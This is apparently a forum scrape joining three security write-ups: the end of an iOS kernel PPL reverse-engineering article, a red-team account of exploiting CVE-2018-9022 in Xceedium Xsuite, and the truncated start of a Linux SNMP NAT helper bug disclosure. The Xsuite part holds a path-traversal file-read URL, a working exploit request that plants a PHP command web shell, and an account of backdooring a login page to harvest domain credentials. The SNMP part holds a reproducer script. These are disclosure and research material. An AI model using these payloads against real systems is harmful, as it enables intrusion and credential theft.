__PPLDATA_CONST.__const. Let's see what it has (Removing the companion file so jtool2 doesn't symbolicate and blow the suspense just yet): minor note: I had to switch to another machine since my 2016 MBP's keyboard just spontaneously DIED ON ME while doing this. $#%$#%$# device won't boot from a bluetooth keyboard, so after I had to reboot it, I can't get in past the EFI screen till I get a USB keyboard (and hope that works). I'm using a slightly different kernel, but addresses are largely the same) morpheus@Bifröst (~) % jtool2 -d __PPLDATA_CONST.__const ~/Downloads/kernelcache.release.iphone11 Dumping 192 bytes from 0xfffffff008f68000 (Offset 0x1f64000, __PPLDATA_CONST.__const): 0xfffffff008f68000: 0xfffffff00747542d "ans2_sart" 0xfffffff008f68008: 03 00 01 00 b7 da ad de 0xfffffff008f68010: 0xfffffff008f541cc __func_0xfffffff008f541cc 0xfffffff008f68018: 0xfffffff008f5455c __func_0xfffffff008f5455c 0xfffffff008f68020: 0xfffffff008f54568 __func_0xfffffff008f54568 0xfffffff008f68028: 0xfffffff008f5479c __func_0xfffffff008f5479c 0xfffffff008f68030: 0xfffffff008f54564 __func_0xfffffff008f54564 0xfffffff008f68038: 0xfffffff008f5430c __func_0xfffffff008f5430c 0xfffffff008f68040: 0xfffffff007475813 "t8020dart" 0xfffffff008f68048: 03 00 01 00 b7 da ad de 0xfffffff008f68050: 0xfffffff008f54a14 __func_0xfffffff008f54a14 0xfffffff008f68058: 0xfffffff008f559c8 __func_0xfffffff008f559c8 0xfffffff008f68060: 0xfffffff008f55df0 __func_0xfffffff008f55df0 0xfffffff008f68068: 0xfffffff008f56858 __func_0xfffffff008f56858 0xfffffff008f68070: 0xfffffff008f55dec __func_0xfffffff008f55dec 0xfffffff008f68078: 0xfffffff008f55280 __func_0xfffffff008f55280 0xfffffff008f68080: 0xfffffff007475931 "nvme_ppl" 0xfffffff008f68088: 03 00 01 00 b7 da ad de 0xfffffff008f68090: 0xfffffff008f56978 __func_0xfffffff008f56978 0xfffffff008f68098: 0xfffffff008f5708c __func_0xfffffff008f5708c 0xfffffff008f680a0: 0xfffffff008f57098 __func_0xfffffff008f57098 0xfffffff008f680a8: 0xfffffff008f572e0 __func_0xfffffff008f572e0 0xfffffff008f680b0: 0xfffffff008f57094 __func_0xfffffff008f57094 0xfffffff008f680b8: 0xfffffff008f56df8 __func_0xfffffff008f56df8 We see what appears to be three distinct structs here, identified as "ans2_sart", "t8020dart" and "nvme_ppl". (DART = Device Address Resolution Table). There are also six function pointers in each, and (right after the structure name) what appears to be three fields - two 16-bit shorts (0x0003, 0x0001) and some magic (0xdeaddab7). It's safe to assume, then, that if we find the symbol names for a function at slot x, corresponding functions for the other structures at the same slot will be similarly named. Looking through panic()s again, we find error messages which show us that 0xfffffff008f541cc is an init(), 0xffffff008f54568 is a map() operation, and 0xfffffff008f5479c is an unmap(). Some of these calls appear to be noop in some cases, and fffffff008f55280 has a switch, which implies it's likely an ioctl() style. Putting it all together, we have: 0xfffffff008f68010: 0xfffffff008f541cc _ans2_sart_init 0xfffffff008f68018: 0xfffffff008f5455c _ans2_unknown1_ret0 0xfffffff008f68020: 0xfffffff008f54568 _ans2_map 0xfffffff008f68028: 0xfffffff008f5479c _ans2_unmap 0xfffffff008f68030: 0xfffffff008f54564 _ans2_sart_unknown2_ret 0xfffffff008f68038: 0xfffffff008f5430c _ans2_sart_ioctl_maybe which we can then apply to the NVMe and T8020DART. Note these look exactly like the ppl_map_iommu_ioctl* symbols we could obtain from the __TEXT.__cstring, with two unknowns remaining, possibly for allocating and freeing memory. However, looking at __PPLTEXT we find no references to our structures. So we have to look through the kernel's __TEXT__EXEC.__text instead. Using jtool2's disassembly with grep(1) once more, this is easy and quick: # grep only the prefix fffffff008f680... since we know that anything with that range # falls in the __PPL_CONST.__const Bifröst:Downloads morpheus$ jtool2 -d ~/Downloads/kernelcache.release.iphone11 | grep fffffff008f680 Disassembling 22431976 bytes from address 0xfffffff0079dc000 (offset 0x9d8000): fffffff007b9e028 0xd0009e40 ADRP X0, 5066 ; R0 = 0xfffffff008f68000 fffffff007b9e02c 0x91000000 ADD X0, X0, #0 ; R0 = R0 + 0x0 = 0xfffffff008f68000 fffffff007b9e034 0xd0009e40 ADRP X0, 5066 ; R0 = 0xfffffff008f68000 fffffff007b9e038 0x91010000 ADD X0, X0, #64 ; R0 = R0 + 0x40 = 0xfffffff008f68040 fffffff007b9e0f0 0xd0009e40 ADRP X0, 5066 ; R0 = 0xfffffff008f68000 fffffff007b9e0f4 0x91020000 ADD X0, X0, #128 ; R0 = R0 + 0x80 = 0xfffffff008f68080 It's safe to assume, then, that the corresponding functions are "...art_get_struct" or something, so I added them to jokerlib as well, though I couldn't off hand find any references to these getters. Other observations Pages get locked down by PPL at the Page Table Entry level. There are a few occurrences of code similar to this: fffffff008f485c4 0xb6d800f3 TBZ X19, #59, 0xfffffff008f485e0 ; fffffff008f485c8 0x927dfb28 AND X8, X25, #0xfffffffffffffff8 ; fffffff008f485cc 0xa900efe8 STP X8, X27, [SP, #8] ; fffffff008f485d0 0xf90003f6 STR X22, [SP, #0] ; *0x0 = R22 fffffff008f485d4 0xb0ff2940 ADRP X0, 2090281 ; R0 = 0xfffffff007471000 fffffff008f485d8 0x910e3800 ADD X0, X0, #910 ; R0 = R0 + 0x38e = 0xfffffff00747138e fffffff008f485dc 0x97ab7fda BL 0xfffffff007a28544 ; _panic _panic(""pmap_page_protect: ppnum 0x%x locked down, cannot be owned by iommu 0x%llx, pve_p=%p""); And this: fffffff008f482e8 0xf245051f TST X8, #0x180000000000000 ; fffffff008f482ec 0x540000c0 B.EQ 0xfffffff008f48304 ; fffffff008f482f0 0x92450d08 AND X8, X8, 0x7800000000000000 ; fffffff008f482f4 0xa90023f5 STP X21, X8, [SP, #0] ; fffffff008f482f8 0xb0ff2940 ADRP X0, 2090281 ; R0 = 0xfffffff007471000 fffffff008f482fc 0x910bf400 ADD X0, X0, #765 ; R0 = R0 + 0x2fd = 0xfffffff0074712fd fffffff008f48300 0x97ab8091 BL 0xfffffff007a28544 ; _panic _panic(""%#lx: already locked down/executable (%#llx)""); Which suggests that two bits are used: 59 and 60 - 59 is likely locked down, 60 is executable. @S1guza (who meticulously reviewed this article) notes that these are the PBHA fields - Page based Hardware Attribute bits, and they can be IMPLEMENTATION DEFINED: Takeaways (or TL;DR) Most people will just run jtool2 --analyze on the kernelcache, then take the symbols and upload them to IDA. This writeup shows you the behind-the-scenes of the analysis, as well as explains the various PPL facility services. 0xfffffff0077c1f20: 0xfffffff008f52ee4 _ppl_pmap_arm_fast_fault_maybe 0xfffffff0077c1f28: 0xfffffff008f51e4c _ppl_pmap_arm_fast_fault2_maybe 0xfffffff0077c1f30: 0xfffffff008f52a30 _ppl_mapping_free_prime_internal 0xfffffff0077c1f38: 0xfffffff008f525dc _ppl_mapping_replenish_internal 0xfffffff0077c1f40: 0xfffffff008f51c4c _ppl_phys_attribute_clear_internal 0xfffffff0077c1f48: 0xfffffff008f51ba0 _ppl_phys_attribute_set_internal 0xfffffff0077c1f50: 0xfffffff008f518f4 _ppl_batch_set_cache_attributes_internal 0xfffffff0077c1f58: 0xfffffff008f5150c _ppl_pmap_change_wiring_internal 0xfffffff0077c1f60: 0xfffffff008f50994 _ppl_pmap_create_internal 0xfffffff0077c1f68: 0xfffffff008f4f59c _ppl_pmap_destroy_internal 0xfffffff0077c1f70: 0xfffffff008f4de6c _ppl_pmap_enter_options_internal 0xfffffff0077c1f78: 0xfffffff008f4dcac _ppl_pmap_extract_internal 0xfffffff0077c1f80: 0xfffffff008f4dae4 _ppl_pmap_find_phys_internal 0xfffffff0077c1f88: 0xfffffff008f4d7e8 _ppl_pmap_insert_shared_page_internal 0xfffffff0077c1f90: 0xfffffff008f4d58c _ppl_pmap_is_empty_internal 0xfffffff0077c1f98: 0xfffffff008f4d1ec _ppl_map_cpu_windows_copy_internal 0xfffffff0077c1fa0: 0xfffffff008f4cef8 _ppl_pmap_mark_page_as_ppl_page_internal 0xfffffff0077c1fa8: 0xfffffff008f4c038 _ppl_pmap_nest_internal 0xfffffff0077c1fb0: 0xfffffff008f48420 _ppl_pmap_page_protect_options_internal 0xfffffff0077c1fb8: 0xfffffff008f4bacc _ppl_pmap_protect_options_internal 0xfffffff0077c1fc0: 0xfffffff008f4b754 _ppl_pmap_query_page_info_internal 0xfffffff0077c1fc8: 0xfffffff008f4b458 _ppl_pmap_query_resident_internal 0xfffffff0077c1fd0: 0xfffffff008f4b3a0 _ppl_pmap_reference_internal 0xfffffff0077c1fd8: 0xfffffff008f4afc4 _ppl_pmap_remove_options_internal 0xfffffff0077c1fe0: 0xfffffff008f4afbc _ppl_pmap_return_internal 0xfffffff0077c1fe8: 0xfffffff008f4acec _ppl_pmap_set_cache_attributes_internal 0xfffffff0077c1ff0: 0xfffffff008f4ac38 _ppl_pmap_set_nested_internal 0xfffffff0077c1ff8: 0xfffffff008f4ac34 _ppl_pmap_0x1b_internal 0xfffffff0077c2000: 0xfffffff008f4aa78 _ppl_pmap_switch_internal 0xfffffff0077c2008: 0xfffffff008f4a8b0 _ppl_pmap_switch_user_ttb_internal 0xfffffff0077c2010: 0xfffffff008f4a8a0 _ppl_pmap_clear_user_ttb_internal 0xfffffff0077c2018: 0xfffffff008f4a730 _ppl_pmap_unmap_cpu_windows_copy_internal 0xfffffff0077c2020: 0xfffffff008f4a09c _ppl_pmap_unnest_options_internal 0xfffffff0077c2028: 0xfffffff008f4a098 _ppl_pmap_0x21_internal 0xfffffff0077c2030: 0xfffffff008f49fbc _ppl_pmap_cpu_data_init_internal 0xfffffff0077c2038: 0xfffffff008f49d0c _ppl_pmap_0x23_internal 0xfffffff0077c2040: 0xfffffff008f49c08 _ppl_pmap_set_jit_entitled_internal 0xfffffff0077c2048: 0xfffffff008f49940 _ppl_pmap_initialize_trust_cache 0xfffffff0077c2050: 0xfffffff008f494c0 _ppl_pmap_load_trust_cache_internal 0xfffffff0077c2058: 0xfffffff008f492e8 _ppl_pmap_is_trust_cache_loaded 0xfffffff0077c2060: 0xfffffff008f47d54 _ppl_pmap_check_static_trust_cache 0xfffffff0077c2068: 0xfffffff008f47d58 _ppl_pmap_check_loaded_trust_cache 0xfffffff0077c2070: 0xfffffff008f46ea0 _ppl_pmap_cs_register_cdhash_internal 0xfffffff0077c2078: 0xfffffff008f46a50 _ppl_pmap_cs_unregister_cdhash_internal 0xfffffff0077c2080: 0xfffffff008f45ef8 _ppl_pmap_cs_associate_internal_options 0xfffffff0077c2088: 0xfffffff008f45ca0 _ppl_pmap_cs_lookup_internal 0xfffffff0077c2090: 0xfffffff008f45a80 _ppl_pmap_cs_check_overlap_internal 0xfffffff0077c2098: 00 00 00 00 00 00 00 00 ........ 0xfffffff0077c20a0: 00 00 00 00 00 00 00 00 ........ 0xfffffff0077c20a8: 00 00 00 00 00 00 00 00 ........ 0xfffffff0077c20b0: 00 00 00 00 00 00 00 00 ........ 0xfffffff0077c20b8: 00 00 00 00 00 00 00 00 ........ 0xfffffff0077c20c0: 00 00 00 00 00 00 00 00 ........ 0xfffffff0077c20c8: 00 00 00 00 00 00 00 00 ........ 0xfffffff0077c20d0: 00 00 00 00 00 00 00 00 ........ 0xfffffff0077c20d8: 00 00 00 00 00 00 00 00 ........ 0xfffffff0077c20e0: 00 00 00 00 00 00 00 00 ........ 0xfffffff0077c20e8: 00 00 00 00 00 00 00 00 ........ 0xfffffff0077c20f0: 0xfffffff008f457b8 _ppl_pmap_iommu_init_internal 0xfffffff0077c20f8: 0xfffffff008f456e4 _ppl_pmap_iommu_unknown1_internal 0xfffffff0077c2100: 0xfffffff008f455c8 _ppl_pmap_iommu_map_internal 0xfffffff0077c2108: 0xfffffff008f454bc _ppl_pmap_iommu_unmap_internal 0xfffffff0077c2110: 0xfffffff008f45404 _ppl_pmap_iommu_unknown_internal 0xfffffff0077c2118: 0xfffffff008f45274 _ppl_pmap_iommu_ioctl_internal 0xfffffff0077c2120: 0xfffffff008f446c0 _ppl_pmap_trim_internal 0xfffffff0077c2128: 0xfffffff008f445b0 _ppl_pmap_ledger_alloc_init_internal 0xfffffff0077c2130: 0xfffffff008f441dc _ppl_pmap_ledger_alloc_internal 0xfffffff0077c2138: 0xfffffff008f44010 _ppl_pmap_ledger_free_internal 0xfffffff0077c2140: 00 00 00 00 00 00 00 00 ........ PPL Protected pages are marked using otherwise unused PTE bits (#59 - PPL, #60 - executable). PPL likely extends to IOMMU/T8020 DART and the NVMe (to foil Ramtin Amin style attacks, no doubt). The special APRR register locks down at the hardware level, similar to KTRR's special registers. Access to these PPL protected pages can only be performed from when the APRR register is locked down (0x4455445564666677). This happens on entry to the Trampoline. On exit from the Trampoline code the register is set to 0x4455445464666477. i.e. ...6677 locks, ...6477 unlocks Why AAPL chose these values, I have no idea (DUDU? Dah Dah?). But checking for the magic (by MRSing) will tell you if the system is PPL locked down or not. For those of you who use IDA, get them to update their special registers already. And add jtool2's/disarm's :-). The APRR_EL1 is S3_4_C15_C2_1. There's APRR_EL0 (S3_4_C15_C2_0) and some mask register in S3_4_C15_C2_6. There may be more. A global in kernel memory is used as an indication that PPL has been locked down The PPL service table (entered through _ppl_enter and with functions all in the __PPLTRAMP.__text) can be found and its services are enumerable, as follows: To get these (~150) PPL symbols yourself, on any kernelcache.release.iphone11, simply use the jtool2 binary, and export PPL=1. This is a special build for this article - in the next nightly this will be default. Q&A When is Volume II coming out? In a matter of weeks, I hope Advertisement There's another MOXiI training set for March 11th-15th in NYC again. Right after is the followup to MOXiI - applied *OS Security/Insecurity - in which I discuss PPL, KTRR, APRR, KPP, AMFI, and other acronyms Greets @S1guza - for a thorough review of the article, and reading the ARM64 specs like few have or ever will. Luca - for reviewing and redacting the reason why the article's namesake applies in more than one way :-).. and pointing out he gave a talk on this at Tensec and BlueHat.il which is well worth reading. Sursa: http://newosxbook.com/articles/CasaDePPL.html
  20. Remote Code Execution — Gaining Domain Admin due to a typo CVE-2018–9022 Daniel C Mar 1 Firstly, apologies for the click-bait title, I did refrain from creating a custom website and logo so I believe this is a fair compromise. :) A short time ago as part of a red team engagement I found and successfully exploited a remote code execution vulnerability that resulted in us quickly gaining high privilege access to the customers internal network. So far nothing sounds too out of the ordinary, however interestingly the root cause of this vulnerability was due to a two character typo. The advisory can be found here. Note: I realise this blog post would be much better if I included some additional screenshots, however I did not want to risk accidentally revealing information about our client. Enumeration After performing some basic enumeration I found a subdomain belonging to the target organisation which proudly stated “Powered by Xceedium Xsuite”. After a bit of googling I stumbled across an exploit-db article containing several vulnerabilities in Xsuite, including unauthenticated command injection, reflected cross-site scripting, arbitrary file read, and a local privilege escalation vulnerability. Easy, right? Arbitrary File Read Unfortunately, due to the targets configuration the command injection vulnerability did not work, the privilege escalation requires prior access to the device, and where possible I wanted to avoid user interaction (so cross-site scripting is a no-no). This left us with the arbitrary file read: /opm/read_sessionlog.php?logFile=....//....//....//etc/passwd Naturally, the only ports that could be accessed over the internet were 80 & 443. Despite being able to read various hashes from the /etc/passwd file, they were useless to us: sshtel:ssC/xRTT<REDACTED>:300:99:sshtel:/tmp:/usr/bin/telnet sftpftp:$1$7vs1J<REDACTED>:108:108:/home/sftpftp At this point I believed the best way forward was to find the hosts document_root, and to start downloading source code. I could then manually audit the code with the intention of finding additional vulnerabilities in Xceedium Xsuite. After reading numerous Apache configuration files the document_root was found: /var/www/htdocs/uag/web/ So far we only know the location of two pages: /var/www/htdocs/uag/web/opm/read_sessionlog.php /var/www/htdocs/uag/web/login.php The source code for both of these files was downloaded using the arbitrary file read and reviewed to find references to any other PHP or configuration files. These were also downloaded. Whilst this process could have been scripted, it was decided that since I would be auditing the code, I may as well manually retrieve the source code during the auditing process (This also has the added benefit of limiting requests to the target host). After a day of manually downloading and auditing PHP I believed I had a good enough understanding of how the application works and had found a few bugs/interesting functions. In addition to the RCE outlined in this post, other vulnerabilities were found along the way such as an additional arbitrary file read and various SQL injection issues. As I could already read local files & no database appeared to be configured, these were useless. My only interest at this point was RCE. The road to code execution One of the interesting functions I had highlighted was linkDB() which reads the contents of /var/uag/config/failover.cfg line by line and passes it to the eval() function. This means that if we somehow find a method to write PHP code to failover.cfg, we may then be able to call the linkDB()function to execute remote code on the host. Interesting, but we currently have no control over failover.cfg or its contents. /var/www/htdocs/uag/functions/DB.php function linkDB($db, $dbtype='', $action = "die") { global $dbchoices, $sync_on, $members, $shared_key; if(!$dbchoices){ $dbchoices = array("mysql", "<REDACTED>", "<REDACTED>"); } //reads file into array & saves to $synccfg $synccfg = file("/var/uag/config/failover.cfg"); //iterates through contents of array foreach ($synccfg as $line) { $line = trim($line); $keyval = explode("=", $line); //saves contents to $cmd variable $cmd ="\$param_".$keyval[0]."=\"".$keyval[1]."\";"; //evaluates the contents of the $cmd variable eval($cmd); } … } After a while I located the functionality that populates /var/uag/config/failover.cfg (This code has been modified slightly to avoid including numerous lines of string parsing!). /var/www/htdocs/uag/functions/activeActiveCmd.php function putConfigs($post) { … $file = "/var/uag/config/failover.cfg"; $post = unserialize(base64_decode($post)); <-- ignore this ;) … $err = saveconfig($file, $post); … } To summarise: We now know the contents of failover.cfg are passed to eval(), which may lead to code execution. We know the putConfigs() function takes a parameter, passes it to base64_decode(), passes it to unserialize() (again, let’s just pretend you never saw this!) and then saves it to failover.cfg Now we need to see where the $post variable that is used in putConfigs() originates from and if we have any control over it. /var/www/htdocs/uag/functions/activeActiveCmd.php function activeActiveCmdExec($get) { … // process the requested command switch ($get["cmdtype"]) { … case "CHECKLIST": confirmCONF($get); break; case "PUTCONFS" : putConfigs($get["post"]); break; … } So the $get parameter being passed to putConfigs() originates from a parameter being passed to the activeActiveCmdExec() function. /var/www/htdocs/uag/functions/ajax_cmd.php if ($_GET["cmd"] == "ACTACT") { if (!isset($_GET['post'])) { $matches = array(); preg_match('/.*\&post\=(.*)\&?$/', $_SERVER['REQUEST_URI'], $matches); $_GET['post'] = $matches[1]; } activeActiveCmdExec($_GET); } So activeActiveCmdExec() takes direct user input. This means we can directly control the input to activeActiveCmdExec(), which is then passed to putConfigs(), base64_decode(), unserialize(), and finally saved into /var/uag/config/failover.cfg. We can now create a serialized, base64 encoded request that will be saved into failover.cfg, afterwards we can then invokelinkDB() which will pass the file containing our malicious code to eval() and we have achieved code execution… Or so I thought. As we will be overwriting a configuration file, one mistake and we may brick the device and have a rather unhappy customer on our hands. Even if we don’t brick the device, we may only get one chance at writing to the config file. Because of this I decided to err on the side of caution and took the relevant parts of code and test our exploit locally. After a few attempts I was getting the message “BAD SHARED KEY”. Unfortunately I had overlooked something at the beginning of the activeActiveCmdExec() function: /var/www/htdocs/uag/functions/activeActiveCmd.php function activeActiveCmdExec($get) { // check provided shared key $logres = checkSharedKey($get["shared_key"]); if (!$logres) { echo "BAD SHARED KEY"; exit(0); } … } The function checks a valid shared key is passed via the $get variable. Without a legitimate key we cannot reach the functionality necessary to write our code to the failover.cfg file, we cannot invokelinkDB() to evaluate our code, and we cannot execute code on the remote host… At this point I believed it may be time to go back to the drawing board and find a new method to attack the host (unsanitised user input being passed to unserialize() perhaps?). Fortunately as I have the ability to read local files, the shared key may be hard coded in the source code or saved in a readable config file. We can then include the key in our request, and pass this check. So let’s check the checkSharedKey() function to see where this shared key is saved. /var/www/htdocs/uag/functions/activeActiveCmd.php function checkSharedKey($shared_key) { if (strlen($shared_key) != 32) { //1 return false; } if (trim($shared_key) == "") { //2 return flase; } if ($f = file("/var/uag/config/failover.cfg")) { foreach ($f as $row) { //3 $row = trim($row); if ($row == "") { continue; } $row_sp = preg_split("/=/", $row); if ($row_sp[0] == "SHARED_KEY") { if ($shared_key == $row_sp[1]) //4 return true; } } } else { return false; } } This function does the following: 1) Check the key passed to it is 32 characters in length; 2) Check the key passed to it isn’t an empty string; 3) Read the failover.cfg file line by line; 4) Check the provided shared key matches the shared key in failover.cfg. So we can use our arbitrary file read to extract the shared key from the /var/uag/config/failover.cfg file, append it to our request, write our serialised, base64’d PHP code to failover.cfg, invoke linkDB() to eval() our malicious code, and execute code on the remote host. After reading the contents of failover.cfg I was greeted with the following: /var/uag/config/failover.cfg CLUSTER_MEMBERS= ACTIVE_IFACE= SHARED_KEY= STATUS= MY_INDEX= CLUSTER_STATUS= CLUSTER_IP= CLUSTER_NAT_IP= CLUSTER_FQDN= The file is empty. We cannot steal the existing key to pass the authentication checks as there isn’t one configured. After again failing I turned my attention back to the checkSharedKey() functionality. The first thing the checkSharedKey() function does is check the provided key is 32 characters long. This means we cannot simply pass a blank key to pass the check. Once again it may be game over. However, after a while I noticed a subtle issue subtle that I had previously overlooked. Did you see it? /var/www/htdocs/uag/functions/activeActiveCmd.php function checkSharedKey($shared_key) { if (strlen($shared_key) != 32) { return false; } if (trim($shared_key) == "") { return flase; } … } Due to a typographic error, when a shared key is provided that is 32 characters in length, but empty after a call to trim(), the function will return “flase”. This will return the literal string “flase” instead of the Boolean value FALSE. Fortunately for us, the string “flase” has a Boolean value of TRUE, thus the key check will be successful and we can bypass the authorisation check. Reviewing PHP’s trim() manual we find the following: http://php.net/manual/en/function.trim.php So in theory we can use 32 spaces, tabs, line feeds, carriage returns, null bytes, or vertical tabs to reach the necessary code paths required to execute code. All because somebody typed two characters the wrong way around in the word “false”! To test our theory we can take the relevant parts of code, and write a small script that utilises the same logic as the Xsuite code. <?php //Take user input $shared_key = $_GET['shared_key']; //Echo user input echo "Input: " . $shared_key . "\n"; //Echo the string length (Hopefully 32) echo "shared_key Length: " . strlen($shared_key) . "\n"; //Pass the input to the checkSharedKey() function $logres = checkSharedKey($shared_key); //Echo out the raw returned value Echo "Raw Returned Value: "; var_dump($logres); //Echo the Boolean value of returned value Echo "Boolen returned Value: "; var_dump((bool) $logres); //Echo either “bad shared key” or “auth bypassed” accordingly if(!$logres) { echo "BAD SHARED KEY\n"; exit(0); } else { echo "Auth Bypassed"; } function checkSharedKey($shared_key) { if (strlen($shared_key) != 32) { return false; } if (trim($shared_key) == "") { return flase; } } ?> I then tested a few inputs to see what happened: As expected, passing a 32 character random string returns the Boolean value of FALSE and we do not bypass the checks. Now to try our theory of carriage returns/null bytes/etc: As predicted, a string composed of 32 carriage returns, null bytes, etc will bypass the checkSharedKey() functionality. We can now bypass the authorisation checks to reach our desired code paths. As there are a lot of steps to this exploit and a significant number of things that may go wrong, it was decided that we should once again test the exploit locally with the relevant code. Exploitation After a while testing locally, the following exploitation steps had been refined: Poison failover.cfg with our malicious code using our $shared_key bypass: ajax_cmd.php?cmd=ACTACT&cmdtype=PUTCONFS&shared_key=%0D%0D%0D%0D%0D%0D%0D%0D%0D%0D%0D%0D%0D%0D%0D%0D%0D%0D%0D%0D%0D%0D%0D%0D%0D%0D%0D%0D%0D%0D%0D%0D&post=YTo2OntzOjExOiJyYWRpb19pZmFjZSI7czo1OiJpZmFjZSI7czoxNToiY2x1c3Rlcl9tZW1iZXJzIjthOjE6e2k6MDtzOjk6IjEyNy4wLjAuMSI7fXM6MTM6InR4X3NoYXJlZF9rZXkiO3M6MzI6IkFBQUFCQkJCQ0NDQ0RERFhYQUFBQkJCQkNDQ0NEREREIjtzOjY6InN0YXR1cyI7czozOiJPRkYiO3M6MTI6ImNsdXN0ZXJfZnFkbiI7czo1NToidGVzdC5kb21haW4iO2VjaG8gc2hlbGxfZXhlYyh1cmxkZWNvZGUoJF9QT1NUWydjJ10pKTsvLyI7czoxMDoiY2x1c3Rlcl9pcCI7czo5OiIxMjcuMC4wLjEiO30= Decoding the contest of the post parameter gives the following serialized payload: a:6:{s:11:"radio_iface";s:5:"iface";s:15:"cluster_members";a:1:{i:0;s:9:"127.0.0.1";}s:13:"tx_shared_key";s:32:"AAAABBBBCCCCDDDXXAAABBBBCCCCDDDD";s:6:"status";s:3:"OFF";s:12:"cluster_fqdn";s:55:"test.domain";echo shell_exec(urldecode($_POST['c']));//";s:10:"cluster_ip";s:9:"127.0.0.1";} which corresponds to a PHP object of the form: $data = array(); $data['radio_iface'] = "iface"; $data['cluster_members'] = array("127.0.0.1"); $data['tx_shared_key'] = "AAAABBBBCCCCDDDXXAAABBBBCCCCDDDD"; $data['status'] = "OFF"; $data['cluster_fqdn'] = "test.domain";echo shell_exec(urldecode($_POST['c']));//";s:10:"cluster_ip";s:9:"127.0.0.1";} 2. Verify the config file has been successfully poisoned by reading it back using the arbitrary file read vulnerability in read_sessionlog.php: 3. Invoke linkDB() to eval() the contents of failover.cfg and execute a command. POST /ajax_cmd.php?cmd=get_applet_params&sess_id=1&host_id=1&task_id=1 c=whoami Conclusion Upon first discovering the Xceedium device, it appeared we had struck gold. A significantly outdated device with publicly available exploits resulting in RCE. Naturally this was not the case and successful compromise took significantly more time and effort than originally expected. For those of you who are curious how the rest of the engagement went. Upon compromising the device we quickly discovered a method to gain root access to the device. Due to the nature of Xceedium Xsuite (Identity and Access Management), hundreds of users were authenticating to the device every day. With root access we simply backdoored login.php to steal hundreds of domain credentials. Fortunately for us some of the clear-text credentials we captured were domain/enterprise administrators. This allowed us complete access to various domains across the globe. Obviously the goal of red teaming isn’t to gain domain administrator, but it certainly helps. :) As previously mentioned, I’m sorry that there aren’t more screenshots showing the actual attack, however I don’t want to risk outing the client. Additionally, at the time of discovery I had no intentions of releasing this bug publicly. Finally I wish I could say Xceedium (Now CA Technologies) were a treat to work with during the disclosure process however that would be a lie. Daniel C Sursa: https://medium.com/@DanielC7/remote-code-execution-gaining-domain-admin-privileges-due-to-a-typo-dbf8773df767
  21. commit cc2d58634e0f ("netfilter: nf_nat_snmp_basic: use asn1 decoder library", first in 4.16) changed the nf_nat_snmp_basic module (which, when enabled, parses and modifies the ASN.1-encoded payloads of SNMP messages) so that the kernel's ASN.1 infrastructure is used instead of an open-coded parser. The common ASN.1 decoder can invoke callbacks when certain objects are encountered. The SNMP helper has two such callbacks defined in nf_nat_snmp_basic.asn1: - For the `version` field of a `Message` (a `INTEGER`), snmp_version() is invoked. - For each `IpAddress` (according to RFC 1155, a 4-byte octet string), snmp_helper() is invoked. These callbacks contain the following code: int snmp_version(void *context, size_t hdrlen, unsigned char tag, const void *data, size_t datalen) { if (*(unsigned char *)data > 1) return -ENOTSUPP; return 1; } int snmp_helper(void *context, size_t hdrlen, unsigned char tag, const void *data, size_t datalen) { struct snmp_ctx *ctx = (struct snmp_ctx *)context; __be32 *pdata = (__be32 *)data; if (*pdata == ctx->from) { pr_debug("%s: %pI4 to %pI4\n", __func__, (void *)&ctx->from, (void *)&ctx->to); if (*ctx->check) fast_csum(ctx, (unsigned char *)data - ctx->begin); *pdata = ctx->to; } return 1; } The problem is that both of these callbacks can be invoked by the ASN.1 parser with `data` pointing at the end of the packet and `datalen==0` (even though, for the `INTEGER` type, X.690 says in section 8.3.1 that "The contents octets shall consist of one or more octets"), but they don't check whether there is sufficient input available. This means that snmp_version() can read up to one byte out-of-bounds and leak whether that byte was <=1, and snmp_helper() can read and potentially also write up to four bytes out-of-bounds. Unfortunately, KASAN can't detect the out-of-bounds reads because, as was pointed out in <https://lore.kernel.org/lkml/552d49b6-1b6e-c320-b56a-a119e360f1d7@gmail.com/> regarding a (harmless) out-of-bounds read in the TCP input path, the kernel stores a `struct skb_shared_info` at the end of the socket buffer allocation, directly behind the packet data. The kernel can only detect that a problem occurred based on the later effects of an out-of-bounds write. It might be a good idea to explicitly add some KASAN poison between the head data and struct skb_shared_info to make it easier for kernel fuzzers to discover issues like this in the future. There are two scenarios in which this bug might be attacked: - A router that performs NAT translation is explicitly set up to invoke the SNMP helper, and a device in the NATted network wants to attack the router. This is probably very rare, since the router would need to be explicitly configured to perform SNMP translation. On top of that, to corrupt memory, an attacker would need to be able to completely fill an SKB; it isn't clear to me whether that is possible remotely. - A local attacker could exploit the bug by setting up new network namespaces with an iptables configuration that invokes SNMP translation. This probably works as a local privilege escalation against some distribution kernels. The normal autoloading path for this code was only set up in commit 95c97998aa9f ("netfilter: nf_nat_snmp_basic: add missing helper alias name", first in 4.20), but from a glance, it looks like it would be possible on kernels before 4.20 to instead first load one of the openvswitch module's aliases "net-pf-16-proto-16-family-ovs_*" through ctrl_getfamily(), then use ovs_ct_add_helper() to trigger loading of "nf_nat_snmp_basic" through the alias "ip_nat_snmp_basic". The following is a reproducer for a git master build that causes a kernel oops (nf_nat_snmp_basic must be compiled into the kernel, or built as a module, I think): ====================================================================== #!/bin/sh unshare -mUrnp --mount-proc --fork bash <<SCRIPT_EOF set -e set -x # make "ip netns" work in here mount -t tmpfs none /var/run/ cd /var/run # this namespace is the router with NAT ip link set dev lo up echo 1 > /proc/sys/net/ipv4/ip_forward /sbin/iptables -t nat -A POSTROUTING -o veth0 -j MASQUERADE /sbin/iptables -t raw -A PREROUTING -p udp --dport 162 -j CT --helper snmp_trap /sbin/iptables -A FORWARD -m conntrack --ctstate INVALID,NEW,RELATED,ESTABLISHED,SNAT,DNAT -m helper --helper snmp_trap -j ACCEPT # this namespace is the destination host for the SNMP trap message ip netns add netns1 nsenter --net=/var/run/netns/netns1 ip link set dev lo up ip link add veth0 type veth peer name veth1 ip link set veth1 netns netns1 nsenter --net=/var/run/netns/netns1 /sbin/ifconfig veth1 192.168.0.2/24 up /sbin/ifconfig veth0 192.168.0.1/24 up # this namespace sends the SNMP trap message ip netns add netns2 nsenter --net=/var/run/netns/netns2 ip link set dev lo up ip link add veth2 type veth peer name veth3 ip link set veth3 netns netns2 # /31 network, see RFC 3021 # we want *.0.0.0 so that the 3 OOB bytes can be zero nsenter --net=/var/run/netns/netns2 /sbin/ifconfig veth3 10.0.0.0/31 up /sbin/ifconfig veth2 10.0.0.1/24 up nsenter --net=/var/run/netns/netns2 ip route add default via 10.0.0.1 # debug ip route nsenter --net=/var/run/netns/netns2 ip route # run the PoC cat > udp_repro.c <<C_EOF #define _GNU_SOURCE #include <arpa/inet.h> #include <stdlib.h> #include 